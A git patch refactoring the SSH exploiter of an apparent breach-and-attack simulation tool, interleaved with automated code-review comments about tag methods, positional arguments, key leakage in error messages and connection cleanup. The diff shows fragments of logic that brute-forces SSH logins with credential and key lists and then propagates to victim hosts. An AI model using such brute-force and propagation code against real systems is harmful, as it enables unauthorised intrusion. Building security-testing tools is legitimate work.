From e8f48085a4f64bc2cf748772eb11241eaac5ab1e Mon Sep 17 00:00:00 2001
From: Kekoa Kaaikala
Date: Wed, 5 Oct 2022 17:43:40 +0000
Subject: [PATCH] Agent: Use the tag properties
---
monkey/infection_monkey/exploit/sshexec.py | 60 ++++++----------------
1 file changed, 16 insertions(+), 44 deletions(-)
diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index 00221edf2..b0a7b7b2b 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -2,7 +2,7 @@ import io
import logging
from ipaddress import IPv4Address
from pathlib import PurePath
-from typing import Optional
+from typing import Optional, Tuple
import paramiko
@@ -43,13 +43,17 @@ SSH_CHANNEL_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
TRANSFER_UPDATE_RATE = 15
SSH_EXPLOITER_TAG = "ssh-exploiter"
-EXPLOIT_TAGS = (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
-PROPAGATION_TAGS = (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
class SSHExploiter(HostExploiter):
_EXPLOITED_SERVICE = "SSH"
+ def _exploiter_tags(self) -> Tuple[str, ...]:
+ return (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
+
+ def _propagation_tags(self) -> Tuple[str, ...]:
+ return (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
+
def __init__(self):
super(SSHExploiter, self).__init__()
@@ -61,7 +65,7 @@ class SSHExploiter(HostExploiter):
logger.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
timer.reset()
- def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
+ def exploit_with_ssh_keys(self, port: int) -> paramiko.SSHClient:
user_ssh_key_pairs = generate_identity_secret_pairs(
identities=self.options["credentials"]["exploit_user_list"],
secrets=self.options["credentials"]["exploit_ssh_keys"],
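Review bot: `_exploiter_tags` and `_propagation_tags` in the `@@ -43` hunk are added as plain methods, yet the commit title calls them tag properties; if `HostExploiter` reads them by attribute access (`self._exploiter_tags`) when it builds the event, the published event would carry a bound method instead of the tuple. Either decorate both with `@property` or confirm that the base class, which is not in this patch, invokes them with `()`. Since both return fixed literals, a one-line docstring on each, such as `"""Tags attached to the exploitation events this exploiter publishes."""`, would also tell a reader that these are presumably the per-exploiter hooks the base class consumes.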
@@ -101,11 +105,7 @@ class SSHExploiter(HostExploiter):
)
self.add_vuln_port(port)
self.exploit_result.exploitation_success = True
- self._publish_exploitation_event(
- target=self.host.ip_addr,
- exploitation_success=True,
- tags=EXPLOIT_TAGS,
- )
+ self._publish_exploitation_event(True)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
except paramiko.AuthenticationException as err:
@@ -114,19 +114,14 @@ class SSHExploiter(HostExploiter):
f"Failed logging into victim {self.host} with {ssh_string} private key: {err}"
)
logger.info(error_message)
- self._publish_exploitation_event(
- target=self.host.ip_addr,
- exploitation_success=False,
- error_message=error_message,
- tags=EXPLOIT_TAGS,
- )
+ self._publish_exploitation_event(False, error_message=error_message)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
except Exception as err:
logger.error(f"Unknown error while attempting to login with ssh key: {err}")
raise FailedExploitationError
- def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
+ def exploit_with_login_creds(self, port: int) -> paramiko.SSHClient:
user_password_pairs = generate_identity_secret_pairs(
identities=self.options["credentials"]["exploit_user_list"],
secrets=self.options["credentials"]["exploit_password_list"],
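Review bot: `self._publish_exploitation_event(True)` in the `@@ -101` hunk passes the success flag as a bare positional boolean, so the call site no longer says what `True` means, where the removed code spelled it out as `exploitation_success=True`. The same pattern appears in the second hunk on this line (`False, error_message=...`), in the `@@ -158` and `@@ -204` hunks, and in `@@ -270` for `_publish_propagation_event(True)`. Keeping the keyword, `self._publish_exploitation_event(exploitation_success=True)`, preserves the readability the old calls had, provided the base-class signature (not in this patch) still accepts that keyword name.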
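Review bot: The new `self._publish_exploitation_event(False, error_message=error_message)` in the `@@ -114` hunk forwards a message that interpolates `ssh_string` into the event payload; `ssh_string` is assigned before this hunk, and if it holds key material rather than a label or fingerprint, the failed-login event and whatever log or telemetry sink consumes it end up carrying a private-key fragment. Worth confirming what `ssh_string` contains; if it is key material, report an identifier instead, e.g. `error_message = f"Failed logging into victim {self.host} with private key for user {user}: {err}"`. exploit_with_ssh_keys begins outside this hunk.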
@@ -158,23 +153,14 @@ class SSHExploiter(HostExploiter):
logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
self.add_vuln_port(port)
self.exploit_result.exploitation_success = True
- self._publish_exploitation_event(
- target=self.host.ip_addr,
- exploitation_success=True,
- tags=EXPLOIT_TAGS,
- )
+ self._publish_exploitation_event(True)
self.report_login_attempt(True, user, current_password)
return ssh
except paramiko.AuthenticationException as err:
error_message = f"Failed logging into victim {self.host} with user: {user}: {err}"
logger.debug(error_message)
- self._publish_exploitation_event(
- target=self.host.ip_addr,
- exploitation_success=False,
- error_message=error_message,
- tags=EXPLOIT_TAGS,
- )
+ self._publish_exploitation_event(False, error_message=error_message)
self.report_login_attempt(False, user, current_password)
ssh.close()
continue
@@ -195,7 +181,6 @@ class SSHExploiter(HostExploiter):
except FailedExploitationError as err:
self.exploit_result.error_message = str(err)
logger.error(str(err))
- return self.exploit_result
if self._is_interrupted():
self._set_interrupted()
@@ -204,15 +189,9 @@ class SSHExploiter(HostExploiter):
try:
self._propagate(ssh)
except FailedExploitationError as err:
- ssh.close()
self.exploit_result.error_message = str(err)
logger.error(self.exploit_result.error_message)
- self._publish_propagation_event(
- target=self.host.ip_addr,
- propagation_success=False,
- error_message=self.exploit_result.error_message,
- tags=PROPAGATION_TAGS,
- )
+ self._publish_propagation_event(False, error_message=self.exploit_result.error_message)
except RuntimeError as err:
error_message = str(err)
self.exploit_result.error_message = error_message
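Review bot: Dropping `return self.exploit_result` from the `except FailedExploitationError` branch in the `@@ -195` hunk lets control fall through to `if self._is_interrupted()` and on into the `try: self._propagate(ssh)` of the next hunk after `_exploit` has already failed; unless the lines before this hunk bind `ssh` on that path, `self._propagate(ssh)` raises UnboundLocalError, which neither `except FailedExploitationError` nor `except RuntimeError` catches, so the failure escapes the exploiter instead of being reported through `exploit_result`. Restoring `return self.exploit_result` after `logger.error(str(err))` keeps the early exit. The enclosing method and the `try` that calls `_exploit` start before this hunk.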
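Review bot: With `ssh.close()` removed from the `except FailedExploitationError` branch in the `@@ -204` hunk, the only close left on this path is the `ssh.close()` visible at the top of the `@@ -221` hunk, so the client is released only when every branch falls through to it; an exception from `_propagate` other than FailedExploitationError or RuntimeError would now escape with the channel still open. Moving the close into a `finally` on this try, i.e. `finally: ssh.close()` ahead of the `return self.exploit_result`, closes the client on every path including the uncaught ones. The method and its remaining branches extend beyond this hunk.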
@@ -221,7 +200,7 @@ class SSHExploiter(HostExploiter):
ssh.close()
return self.exploit_result
- def _exploit(self, port) -> paramiko.SSHClient:
+ def _exploit(self, port: int) -> paramiko.SSHClient:
try:
ssh = self.exploit_with_ssh_keys(port)
except FailedExploitationError:
@@ -270,14 +249,7 @@ class SSHExploiter(HostExploiter):
)
self.exploit_result.propagation_success = True
-
- self._publish_propagation_event(
- target=self.host.ip_addr,
- propagation_success=True,
- tags=PROPAGATION_TAGS,
- )
-
- ssh.close()
+ self._publish_propagation_event(True)
self.add_executed_cmd(cmdline)
except Exception as exc:
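Review bot: Removing `ssh.close()` after the successful propagation event in the `@@ -270` hunk hands ownership of the client's lifetime to the caller, but nothing in the method says so; the method (presumably `_propagate`, called from the `@@ -204` hunk) starts before this hunk and its `except Exception as exc:` branch continues past it. A docstring line on that method such as `"""Propagate over *ssh*; the client is left open and must be closed by the caller."""` would record the new contract so that a later maintainer does not reintroduce a close here on the assumption that the method owns the connection.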